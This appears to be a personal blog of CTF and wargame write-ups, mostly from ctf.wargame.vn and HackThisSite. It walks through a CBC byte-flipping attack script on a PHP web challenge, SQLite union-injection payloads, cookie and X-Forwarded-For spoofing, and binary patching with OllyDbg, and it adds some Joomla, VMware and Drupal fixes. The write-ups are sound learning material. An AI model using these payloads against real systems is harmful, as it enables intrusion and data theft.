Monday, September 9, 2013

ctf.wargame.vn web300

After reading a good article cbc-byte-flipping-attack-101-approach, I remember the last ctf called web300 hosting at wargame.vn also used this technique to get a fla.
http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9

After write something to server we get some useful things:
link:
/?file=362e10cd887022a369c60c3961edf89eaeadfde998a4c6d9794c9e99316c44a39b73b02e3fa2e75820706609e2549ad9bf6a32ce42737fe212e6fa6a91f6fd21&sign=56eb7a1a95ef06c35c6a942e7da55462
filename: 5ac30b7bd737fc5c04d739a61d9f47f0

with the hint, we get the source code. below are some important functions
            function strToHex($string)
            {
                $hex='';
                for ($i=0; $i < strlen($string); $i++){
                    $tmp = dechex(ord($string[$i]));
                    $hex .= (strlen($tmp)==1)?"0".$tmp:$tmp;
                }
                return $hex;
            }
            function hexToStr($hex)
            {
                $string='';
                for ($i=0; $i < strlen($hex)-1; $i+=2)
                    $string .= chr(hexdec($hex[$i].$hex[$i+1]));
                return $string;
            }
            //
            // encrypt + decrypt AES
            //
            include("init.php"); // define _KEY,_IV,_SECRET
            // flag in ./secret/flag.php

            function encrypt_($str){
                return strToHex(mcrypt_encrypt(MCRYPT_RIJNDAEL_128, _KEY, $str, MCRYPT_MODE_CBC,_IV));
            }
            function decrypt_($str){
                return rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, _KEY, hexToStr($str), MCRYPT_MODE_CBC,_IV),"\0");
            }
            function hmac_($msg,$secret){
                return hash_hmac('md5',$msg,$secret);
            }

            if(!empty($_POST['secret']) && is_string($_POST['secret']) && strlen($_POST['secret']) < 1337){
                 $secret_hmac = md5(_SECRET.rand(0,1337),true);
                 $secret_filename = md5(session_id.$secret_hmac);
                 file_put_contents("./secret/".$secret_filename,$_POST['secret']);
                 $secret_link = encrypt_($secret_filename."|".$secret_hmac);
                 echo "<br /><a class='button button-blue' href='?file={$secret_link}&sign=".hmac_($secret_filename,$secret_hmac)."'>Your secret</a>"; }elseif(!empty($_GET['file'])){
                $decrypt = explode("|",decrypt_($_GET['file']));
                $secret_filename = $decrypt[0];
                $secret_hmac = $decrypt[1];
                $hmac_ = $_GET['sign'];
                $error = false;
                if(strlen($secret_hmac) != 16){
                    echo "HMAC: Bad length! (".strlen($secret_hmac).")
";
                    $error = true;
                }      
                if(hmac_($secret_filename,$secret_hmac)!==$hmac_){
                    echo "HMAC: Not match!
";
                    $error = true;
                }

               
        ?>
                                     <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>">
                            <?php
                                if(!$error)
                                    echo file_get_contents("./secret/".basename($secret_filename)); // anti directory traversal
                                else
                                    echo "ERROR!";
                            ?>

                       </blockquote>
             
        <?php
            }else{
        ?>

By observing that code, we see that:
- flag in ./secret/flag.php
- filename is generated randomly and displayed in  <blockquote class="curly-quotes" cite="./secret/<?=$secret_filename?>
- this uses aes 128 cbc mode which can be exploited by byte flipping technique
 - filename and hmc is seperated by "|" character

Firstly, we need to fake a system open flag so the output filename should be /flag.php. Luckily, because function "basename" is used, filename can be whatever ending with /flag.php (so the result is always /flag.php). We know that generated filename is 32 byte long, and AES 128 use block 16 bit, hence, we can change last 9 byte of that filename (len(/flag.php)=9)

fake_filename = "/flag.php"
true_filename = '5ac30b7bd737fc5c04d739a61d9f47f0'

file='362e10cd887022a369c60c3961edf89eaeadfde998a4c6d9794c9e99316c44a39b73b02e3fa2e75820706609e2549ad9bf6a32ce42737fe212e6fa6a91f6fd21'
file = file.decode('hex')

sign="56eb7a1a95ef06c35c6a942e7da55462"
#because we need to change only last 9 byte of second 16-byte block 
fakefile = file[:7]
for i in range(7,16):
    fakefile += chr    (ord(file[i]) ^ ord(fake_filename[i-7]) ^ ord(true_filename[16+i]))

fakefile+= file[16:]

#now we have fake filename, try to request to server to see that filename is correct
url = "http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=" + fakefile.encode('hex') + "&sign=" + sign

from now on, we have fake filename but we still can not get the flag because of   if(hmac_($secret_filename,$secret_hmac)!==$hmac_)

Next, we know character "|"  is used to seperate username and hmac. By Using same technique, change the character number 33 in plain to another character rather than "|", let's say "&"
 ( username + "|" + hmac, and len(username)=32)

fakehmac = file[:16]
fakehmac+= chr(ord(file[16]) ^ ord('|') ^ ord('&'))
fakehmac+= file[17:]


url = "http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=" + fakehmac.encode('hex') + "&sign=" + sign

since then, we have hmac right at position 33

sec_hmac =  request(url)[33:]


#now we already have sec_hmac =>md5 with msg and secret  to generate sign

sign = hmac.new(sec_hmac, dec_fake_filename).hexdigest()

url = "http://challenges.wargame.vn:1337/web300_c4d7c1d9c925b4021adf5e192315ecb9/?file=" + fakefile.encode('hex') + "&sign=" + sign

print getflag(url)

shl

to perform shl eax,cl in python

if cl>32: cl = cl %32
return eax << cl


Wednesday, August 14, 2013

ctf.wargame.vn web200

url: http://challenges.wargame.vn:1337/web200_3b3b44938292fda6efa33655c0954123/

Monday, August 12, 2013

ctf.wargame.vn 2013 web150

url:http://42.117.7.116/web150_be56cb18b29a7b9dba9497d46e58ca83/
Hint:
Hint 1: ~~:>
Hint 2: Get index.php source !
Hint 3: Go home #mysql, you're drunk

ctf.wargame.vn 2013 web100

URL:
http://challenges.wargame.vn:1337/web100_f977a5eaea38b2dcd992c112bdb84b9a/

Hint:
Hint 1: Real-world exploit ;) it's easy , it's not about SQLi ..
Hint 2: We will check your feedback! Please wait few minutes :)

ctf.wargame.vn MISC200

URL:http://challenges.wargame.vn:1337/misc200_7c51d1b6cabdef3792760bc340f868ba/
challenge hint: Mario vừa phát minh ra một chương trình Web Browser ;). Đây là bản demo, nếu bạn hứng thú hãy gửi *coin* về root@wargame.vn ;)

Tuesday, August 6, 2013

ebctf 2013 - Bin200

To begin with, this challenge is very exciting and tricky. I've learnt a lot from this challenge.
Here is a link:
http://ebctf.nl/challenges/BIN200
Here is a file:
http://ebctf.nl/files/fcb920470457ec583006ca1de1025e17/ebCTF_BIN200.exe


Saturday, July 27, 2013

ctf.wargame.vn teaser round web100

This challenge is also quite simple which need you to pay more attention to what server send to and get from your browser.
What a host give us a hint is:
có 7 levels :) + Level 6-7 dùng SQLite

Level 7: Bạn phải đoán đc câu query là gì :).Hãy thử %29 %22
Các level khác: tìm hiểu PHP và Apache :).

In this challenge, i use only web browser (firefox or iceweasel) with some addons and burpsuite to modify packets before they are sent.
Let's start with the link
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/

It works!..

Basically, it seems that website is not complete. Try to open page source. Nothing special in source except there is a vertical scroll bar. Let's try to scroll down to a bottom. Here, a level 2 link is hidden here. This one is always a trick to some players.

Let's keep to level2 with the link we have in the previous level.

You're not logged in!

wtf, why aren't not logged in?There is no form for us to authenticate. There must be another way to make server believe that we are logged. One way to do this is by using cookie. We need to send cookie to server to let it know we are already logged in. Using cookie manager, a firefox addon, gives us nothing, there is no cookie store already. Next, let's check what server send to us by using live http header, another firefox's addon. (thanks ML for this hint, I dont even think that i need to examine what server send becase of my little ctf experience)

Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT

That's explain why there is no cookie stored in our browser. The job is easy now by set cookie login to 1 and set our request to server to get next level link

in level3, we do the same way as level2 instead of set login cookie to ip address which is hidden in page source of this level.

Level 4 requires more challenge than the first 3 levels. Open source page and we get an array of server variables and a hidden variable

I have to guess that to pass this level, we need to set server variable HTTP_1337 to 1337.
What you need to do this level, you need to understand what server variable is and how it gets from request. (http://www.php.net/manual/en/reserved.variables.server.php)
insert the folowing line in to request's HTTP header before it is sent to server
1337:1337

Level5 is also the same as level4. We need to change our IP address ($_SERVER['REMOTE_ADDR']) to 127.0.0.1 which seems impossible.  Just using google and found interesting http://en.wikipedia.org/wiki/X-Forwarded-For

Move to the next level. This level is no more php exploit. It requires sql injection skill.
?id=1
Hello manhluat!

Try to change value to see whether there is exploitable.
?id=1'
Nothing ...

so, there may be injectable. Do some more SQLis
id=-1 union select 1,1,1;--
Hello 1!

It works! Now, it is time to exploit this level. We know this level uses SQLlite; therefore using following query to get table name
?id=-1 union select 1,name,1 from sqlite_master WHERE type='table' ;--

Hello users!

We get the table users.

?id=-1 union select 1,username,1 from users ;--
Hello admin!

?id=-1 union select 1,password,1 from users where username='admin';--
Hello ....(level7 link)!

Following the link, we reach level 7.In this level 7, the host give us some hints by using %27 and % 29 which stand for " and ) character.


?id=-1
Hello!
?id=-1"
Nothing... ->There must be error with sql query
?id=-1")
Nothing...
?id=-1");--
Hello!

Ok, now we guest the query should be: select ... from ... where (id="xxx")

let's do some more
?id=-1") union select 1,1,1 where ("1"="1
Hello 1!

ok. Now we know how to pass this level. Do as what we do in the previous level.
?id=-1") union select 1,name,1 from sqlite_master where ("1"="1

Hello flag!

?id=-1") union select 1,flag,1 from flag where ("1"="1

Done.

ctf.wargame.vn teaser round web50


 There are 2 links in this challenger
  • main: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/?x=

  • source code: this looks like a mistake of web decoder when they leave the temp version of web source code: http://challenges.wargame.vn:1337/web50_4e4d6c332b6fe62a63afe56171fd3725/index.php~

So, firstly, just check the source code to see what this mission requires?
 Open that source code link, it is a blank page. No worries, view source code (this is the most important part all all web challenger).

error_reporting(0);
$flag = file('../../flag.txt');
if ($_GET['x']==="\x01\x03\x03\x07")
 echo $flag[0];
?>
  
It seems that main will compare x parameter  with some values which are 0x01, 0x03, 0x03 and 0x07, those are hex value; hence, we need to feed that x what it requires.
To do it, we have to know how to pass hex value in web browser. We need % (percent) symbol to pass hex value. For example, %20 stands for a space ( )
Back to main link. try to feed ?x=%01%03%03%07 and we get flag

Wednesday, July 17, 2013

HTS App 16

First though, this app should be marked as easy.
It uses createprocess API to load a bat file which is hidden in secret place. Find that bat file will solve this application.

HTS app 12

This application is different from the others. It does not show password up or hide it somewhere else. It creates password while running
There are 2 timers. one for display verifying password and the other for checking password.
With vbdecompiler lite, you can get address of timer_timer() function. Set breakpoint there with Ollydbg.
Try to find a condition jump which lead to message Possibly correct!
When you get there (cond jump), try to search what you need in stack. If you are not native speaker, you may need a dictionary to look for real password (like me :P)

Joomla error Warning: Invalid argument supplied for foreach() in .../libraries/joomla/database/database/mysql.php on line 383

This error made me headache for a morning.
These warnings are displayed instead of displaying articles
 You can also have a problem when you login  to admin panel and can not read some articles, category,..
Also, using phpmyadmin can not get table structure although you repair them.
Anyway, you can see this error when trying to save configuration file:

“The Global Configuration extension could not be found. Text filter settings have not been saved.”

 
The problem is: tmp of mysql server is full
Solution: Clear tmp
Done!

HTS app13

As you see the hint, to complete this application, you need to base on the time of execution.
- Bruteforce (1-999) each number.
- start with number 1, then number 2 and number 3.
- When you get 3 number, do the same with number 4 that will show you the password when all 4 numbers are matched.
Note: When i bruteforce number 4th, I have to wait forever before I realize that i need me to hit Any Key to confirm; hence, you need to take care this number.

Tuesday, July 16, 2013

HTS app11

This app is so ridiculous. After reading some hints, i got it when I maximize app

HTS App10

This application is very easy to get a password.
- open app10win with vbdecompiler lite
- you will notice there are three functions but you can see only 1 button, so there will be a hidden thing.
- with ollydbg, change the address of command 1 function to that hidden function, you will get the correct password

Monday, July 15, 2013

hackthissite application 5+6

With OllyDbg
- Search for important text
- Trace the code and carefully examine what is stored in stack.

hackthissite application 4

What i need is ollydbg and vb decompiler lite
- Open app4 with vb decompiler lite
- wait until it decompiles completely
-  looking for addresses of Command1_click and Command1_mousemove
- attach app4 with ollydbg and run it.
- find address of JUMP to Command1_mousemove function
- change it with JUMP to Comand1_click function
-done.

Saturday, July 13, 2013

realistic mission 15,16

what i've learnt today are:
- read source code carefully
- unzip zipped file with password without password with pkcrack
- $$var =>$($var)
- override php variable with post and get

Friday, February 22, 2013

vmware errror on fedora

use command below if you get error kernel hearders version were not found when running vmware (of course you've installed kernel-devel..) 
cp /usr/include/linux/version.h /lib/modules/3.7.2-204.fc18.x86_64/build/include/linux/
 
update patch for kernel 3.8.x
http://communities.vmware.com/thread/432897 

Tuesday, January 22, 2013

i18n and variable error on updating

when you update drupal, if you get these errors
Variable store (7.x-2.x) (incompatible with version 7.x-1.2)
Variable realm (7.x-2.x) (incompatible with version 7.x-1.2)

try to remove 2 directory i18n and variable in /site/default/modules/
then upload 2  older version of i18n and variable first (i18n ver 7.x.1.5 and variable ver 7.x.1.2
run update.php

if it run successfully, upload your new i18n and variable modules (i18n ver 7.1.8 and variable ver 7.x.2.1 for example) to site/default/modules then run update again. it should be done!